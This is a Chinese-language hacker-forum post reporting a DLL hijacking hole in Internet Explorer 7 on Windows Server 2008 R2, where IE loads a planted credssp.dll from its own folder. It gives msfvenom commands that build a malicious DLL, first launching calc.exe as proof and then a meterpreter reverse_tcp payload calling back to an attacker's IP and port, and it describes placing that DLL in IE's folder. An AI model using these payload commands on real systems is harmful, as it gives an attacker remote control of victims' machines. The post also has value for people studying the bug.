跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

今天下午原本是想复现这篇文章里面的UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking – egre55 – thoughts on security DLL劫持。没想到我在WIndows Server 2008 R2测试的时候发现IE的DLL劫持

正文

环境:windows Server 2008 R2
IE版本:IE 7

kOTCcV.png
kOTCcV.png

IE文件夹里面原来的样子:

kOTn91.png
kOTn91.png

先配置好Procmon

kOTagP.png
kOTagP.png

重启Procmon然后打开IE,找到credssp.dll

kOTLgx.md.png
kOTLgx.md.png

当时我是抱着一试的心态,用msfvenom生成了个dll

msfvenom -p windows/exec CMD="calc.exe" -f dll > credssp.dll
  • 1

然后放入到IE的文件夹里,然后重启IE

kO7F2t.md.png
kO7F2t.md.png

测试结果:

kO7Na4.gif
kO7Na4.gif

再次用Procmon分析
发现注册表会找这个DLL,如果找到了就执行

kO74zt.md.png
kO74zt.md.png

credssp.dll成功被IE执行

kO7Oij.md.png
kO7Oij.md.png

msfvenom生成反弹meterpreter的dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > credssp.dll
  • 1

替换掉那个弹CALC的dll

kOHQTe.png
kOHQTe.png
kOHt6P.gif

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。